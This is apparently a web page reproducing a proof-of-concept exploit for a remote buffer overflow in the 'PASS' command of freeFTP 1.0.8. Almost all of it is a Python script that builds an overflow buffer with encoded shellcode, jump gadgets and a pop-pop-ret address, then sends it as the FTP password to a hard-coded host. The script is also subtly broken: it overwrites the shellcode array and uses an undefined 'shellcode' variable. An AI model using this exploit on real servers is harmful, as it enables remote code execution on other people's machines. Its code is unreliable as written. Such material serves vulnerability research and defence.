freeFTP1.0.8 'PASS'远程缓冲区溢出
freeFTP1.0.8-'PASS'远程缓冲区溢出¶
POC¶
# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
# Date: 2019-09-01
# Author: Chet Manly
# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
# Version: 1.0.8
# CVE: N/A
from ftplib import FTP
buf = ""
buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36"
buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32"
buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f"
buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62"
buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57"
buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31"
buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72"
buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44"
buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f"
buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70"
buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73"
buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78"
buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30"
buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b"
buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66"
buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a"
buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e"
buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71"
buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66"
buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f"
buf += "\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52"
buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55"
buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b"
buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42"
buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55"
buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58"
buf += "\x45\x35\x53\x30\x41\x41"
buf = 'A' * 276
buf += '\x90' * 10
buf += shellcode
buf += 'B' * (486 - len(shellcode))
buf += '\x58' # pop eax
buf += '\xfe\xcc' # dec ah
buf += '\xfe\xcc' # dec ah
buf += '\xff\xe0' # jmp eax
buf += 'C' * 4
buf += '\xe8\xf0\xff\xff\xff' # call near
buf += 'D' * 9
buf += '\xeb\xf0\x90\x90' # jump backwards
buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret
buf += 'E' * (1000 - len(buf))
ftp = FTP()
ftp.connect('192.168.1.1', 21)
ftp.login('anonymous', buf)
最后更新: 2023-10-12